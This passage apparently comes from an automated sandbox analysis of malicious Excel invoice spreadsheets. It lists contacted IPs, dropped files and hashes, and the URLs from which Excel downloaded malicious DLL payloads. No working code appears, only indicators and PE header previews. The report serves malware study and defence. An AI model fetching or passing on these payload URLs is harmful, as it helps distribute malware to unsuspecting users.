                                                                                • 194.225.58.214
                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):58936
                                                                                Entropy (8bit):7.994797855729196
                                                                                Encrypted:true
                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                Malicious:false
                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):326
                                                                                Entropy (8bit):3.117051994467751
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKlSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                                                MD5:18297D8D972221483A5990B196BF346D
                                                                                SHA1:94EA32F361519D232CA0EFB24CB00B1DA69D323A
                                                                                SHA-256:C7D7F93946851BBEEACF2C066FEF131154F407F32E270F1AC3EC3DDCD2ABF59F
                                                                                SHA-512:A7B551675C156D0AB617C19B6B63406927A981D6090EA9345D1E73391F6DBC59CAEB2D83F653C387AED97542A85B1DB2138777C4C947A0BF50D25D3247A313AA
                                                                                Malicious:false
                                                                                Preview: p...... ................(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\suspendedpage[1].htm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):7614
                                                                                Entropy (8bit):5.642774657070028
                                                                                Encrypted:false
                                                                                SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJyB:QJvVGaRF8I84
                                                                                MD5:7D326EC20489C8098EB61BD74AB3EBA0
                                                                                SHA1:6395954055C2D6CD5275F0317B989BCAB05A36CA
                                                                                SHA-256:D6778D9798302215E44B3E65F8F201AEE15C57F71D9F4100F96C23B55CD56B9A
                                                                                SHA-512:DEE3A98C08E257E3D1D151360C2E00175807D1199AB761D04442DB8A6DD32650482EBEBCA95F88CA9C84458C2D7EB71AB7C63F3EC98990930B642C22B3954DAD
                                                                                Malicious:false
                                                                                IE Cache URL:http://laureys.be/cgi-sys/suspendedpage.cgi
                                                                                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):12310
                                                                                Entropy (8bit):6.535237890734359
                                                                                Encrypted:false
                                                                                SSDEEP:384:MJJgczFIb+vyYLB3oUm3ZmHGyd4gi12tI4:KFIbAB39m3Zmp+x12n
                                                                                MD5:DF5ADB39B1173368D4D28069342A8E5F
                                                                                SHA1:B3D1414D5E487FC2D9A926A902E6D7C89D5C98CE
                                                                                SHA-256:BA3C345884A8FD7FEF0111D9F7AE4C034C2D9D767E3D59A11F13671535610A0F
                                                                                SHA-512:A816DCA29C64589BB84EBDC7733F3BA3B175B91E8226E7DD52CC2B33DB2119547E3FA0F2DC32338EA3707209D8CDF269A0E8D3EDA3A90B8253672FB21E6D5207
                                                                                Malicious:true
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://cms.ivpr.org/by9zwa7p1.zip
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://artec.com.tr/xkpffwn.zip
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                IE Cache URL:http://monitrade.net/h79fwesfe.rar
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2F6E8C4.png
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PNG image data, 699 x 298, 8-bit colormap, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):5737
                                                                                Entropy (8bit):7.823093930699959
                                                                                Encrypted:false
                                                                                SSDEEP:96:/pzh0Wk1Doo3NH1xHvMYXyCa/BY8/CRApdM1f4EkiaaaaaaomB8DIx7GpHWdQ95C://0N06xP1yCa/+8/CyM1fJkiaaaaaar/
                                                                                MD5:32BAB8AD09773064F93EBD99958580EC
                                                                                SHA1:9DE1C4B468E6D74CFF7A944601F4FF6D257E6C84
                                                                                SHA-256:4D4AE615AFDFF15B86FB39B8E591E65673B807AE1D0109AF287AD3B74136E514
                                                                                SHA-512:39E928812465920356513DA67519E9F2A91B1767BB4AC515DA1BADE76885274834AA1A7FCA78768A2A1E01197C59886D0CF89EF2313DC7E6C3271629F1A90800
                                                                                Malicious:false
                                                                                Preview: .PNG........IHDR.......*....."oh.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.............u..........t.....dk......QQQyyz........IDATx..b.0.D....r.....9..,gI.......K..Y.?...B..t..>..)....~.v.I[.|..|.v..mL.^HJ..$.viQ.>...).-.BZ...E.I.]Z....-J.gj._,d...n...-..j...@}[gj..Z2M.Zt...!.z.tL...&...i.LE..zsN.......-..-.?.!.z...v..G_....:i>.....k.;.x...v...?X..Y._.$.9.v-9cWn..*.M.....qG.R..z......g..G..lV..e.?...c.c..t.c.U....i.e.,..)_.%...W.u*.e.....z.....b]6.._.I.lQ..tL..v..'pT>.|o7l.Z...P...}.t..j..w5.. /WKI........J.nP....=.NR....f..t..w.._}..e........?~..N...]&.q6.p.,?..F....w........V..7.J...5)I'Kz....bwI....x..+.....I~6kw.q.~.%m......tU......z..6..{..o+.@...T.c..2..t..'.u.^R.MJ./.7...KT>^..j....j[..+..Ni..;./Y.%[Z.m...U..X...'=..r..v:.6....\.OZ.O...Y.....;.YK......II:w._.nY.85#.mS.....a.r..ep.W....R../..3'....go.....Y..S.Q.D....w...c...o.EI:g._.5..%-....:|....;...,E.uW.......?..h....;,J.....T..],..w9G..E...&.D...thr).....N.....$.9..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCA4260F.png
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PNG image data, 114 x 98, 8-bit colormap, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):3119
                                                                                Entropy (8bit):7.810693367525396
                                                                                Encrypted:false
                                                                                SSDEEP:48:7ki5Nxsg2IqnSTJZi8G+vJeKCtWOLcCeX5cJw4oeSsP9SqXDA32Nkq1lxht:7ki5NxAInjG+kKfF/4EmND8Uk+xP
                                                                                MD5:98DFB630470988A5BD9D129F24CE30FA
                                                                                SHA1:13173C493DC38AFB982EB060F24F1BB7936A752B
                                                                                SHA-256:22328705665F71B26B7E15ECB6D7E9794002F4B2432DF692278CC559650953D6
                                                                                SHA-512:E999272141FD04B48268138A25943640760E45DA654283A7A64929C21C04859F6CC89BA4A79456F5F75439966E616D33CF34FABA5485D9D2F54E0A254CEDCC8D
                                                                                Malicious:false
                                                                                Preview: .PNG........IHDR...r...b.......w.....sRGB.........gAMA......a.....PLTE.........``PPP@00 @@@.........pp````.........00.@@.... .``.............. ....PPP...........p......... .....pp....ppp...00. .pp. .......... ...@P.............PP.0 .. . @@.000P@.0@0............``..........@@ .... ..........ItRNS............................................................................U....pHYs..........o.d....IDAThC.Z.{.:..^x.......A..4...........@D!\.=...j.3Lf..d......N.+...=.rFO...n.3k..y.G...m..*.H;...'....FE.9.C9.45m...|g..]..k...?'0..~6....Nm.[..*.\.j.....[......M..j.N:?...A........v.d*N...47...@.R..KT1....[.^..e....t.VI.8.fp[|..P>>..P=)...e0._|.z.>.o@..|.Z...?..}..........5..............n.....s..y5.\..7...#jd>.....Kh.a).1...u..|..=..%...g..W....1.R.CO.{.>s%........*....>..^T.... .".....&0.n.......:.....h./...3WB.X...-.5.x..1..ID.......(R.X....B`....-...'.W.7f...}...Cr.C.x..<...^....[6k)x...x&.s.....Z...[>A.wVB..F=|R...B...y....h\X...e.L..... .6...3l..>.>..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emf
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                Category:dropped
                                                                                Size (bytes):2352
                                                                                Entropy (8bit):2.843492352371811
                                                                                Encrypted:false
                                                                                SSDEEP:24:YgelY0cSOKNHoKNpJSVvb+rLDkcmBSmkDVZWIHFm+rlzGDLpEn:v0O+I+rSVSciDVZvk+xCDL6
                                                                                MD5:02DE6899749BC90C8436783A76485FE5
                                                                                SHA1:D7D91A77F61E69EC6F152E3CDE9C0A55AF8CF069
                                                                                SHA-256:5A6AD5DD29DAC89DDF7D058B243B6CAA122A0C6FAC2B9FB5F853FD49E47D4D5E
                                                                                SHA-512:72CA635DBD1A8D200B62D021B1C5D7E787B19618DE978C6ABF7F2F7BAA32428840053B4874E30225EFA6BB425B4AE50E3FADF8FCF818D09319F28B2D23C94CB3
                                                                                Malicious:false
                                                                                Preview: ....l................................... EMF....0...(.......................`...1........................|..F...(.......GDIC..........................................................................................-.........!.............................-...................................-.........!.........................$.............................-.......................................$.............................-...............-.........!...............-...........................Calibri........J.....v!;............-...........................2.................1........................"System.).......B....................-.......'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................'.......................%...........................................................%...........L...d...................
                                                                                C:\Users\user\AppData\Local\Temp\780F0000
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):54593
                                                                                Entropy (8bit):7.809761757134018
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Xp7RRUsqW5baZAqO6ZmYWNFtu+y5M9PF9GqcBre9OZ:XpfeZAhWKuOoiK
                                                                                MD5:0F8207B106153E236B13299853CDBA86
                                                                                SHA1:7CC5BAB94F668A25E71B6DFA6A6DA9F3E680CF9E
                                                                                SHA-256:52A295D89BAD2B935B882EE30A6FCAAB804D1AEF5DA7DA39BC381D00DD59EC99
                                                                                SHA-512:9B4700C3A9CDB42A95C5649717AF8E3DDB08E63E20B675CBF25A2635E4A4C5BEE239592A46769C3C9AB15B89F4CB4911F3F58FA1606BD47673F8992CF7BB2906
                                                                                Malicious:false
                                                                                Preview: ...n.0.E.......D'..(,g..4@R.[..I....(..w(9N..a...E.{f.....I....sr..H...B.*'?....I.....FCN.........OP.}N....J=.A1....WJ.....U.2.c......F..!..l.7P.'....o..l.&........V....J.].@RS..Ca..B..[...5@P2.N .=@...'t.iuu..*....+@...6.+.....fR.}.2Tv..ZX....!....I.|.Q...3V8....*'.H..wL...V.g.v[cv.t...|.-..u.)...l+.../%.!u.wRO.....z)..]0.nK.y{......&..s.....{......>.....:...}.K.g..4.mc.M..5sP<.lb....O.8..p{z...u?..p......p=.......A..1?..BL4.f....<dK._ec.8...z....../.%.S.F....l.j.G".....).q..P..i..c........PK..........!.aQ._............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\CabF789.tmp
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):58936
                                                                                Entropy (8bit):7.994797855729196
                                                                                Encrypted:true
                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                Malicious:false
                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):241332
                                                                                Entropy (8bit):4.206824555297794
                                                                                Encrypted:false
                                                                                SSDEEP:1536:cGtLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:ckNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                MD5:A66589E6EA76694010E643B83536ECDD
                                                                                SHA1:F546989B665D046F2F3E3A2D875F8BF788F4CD5C
                                                                                SHA-256:65E8323065EBA93550158F3CE48104DF6ECF862C1A0BDE65845EB45443A05DD5
                                                                                SHA-512:D14EFFE1F02C96D7A9A3F6C38DE4CCF26464D88A319AD3A583126DE8AF2BC9CCB3218B34D943ECE3C02FD6BD39BCF9FA51AD9F4D02806F9C7423062B3D6B3BDE
                                                                                Malicious:false
                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\TarF78A.tmp
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):152533
                                                                                Entropy (8bit):6.31602258454967
                                                                                Encrypted:false
                                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                Malicious:false
                                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......15Q!uT?ruT?ruT?r...rtT?rx..rwT?rx..rtT?rx..rzT?rx..rwT?r...rvT?ruT>r<T?rx..rtT?rx..rzT?rx..rtT?rx..rtT?rRichuT?r........PE..L......R...........!.....d...........o....................................................@.........................`r..M...\q..<...................................`...8...........................(...@............p..\............................text....b.......d.................. ..`.data................h..............@....idata.. ....p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
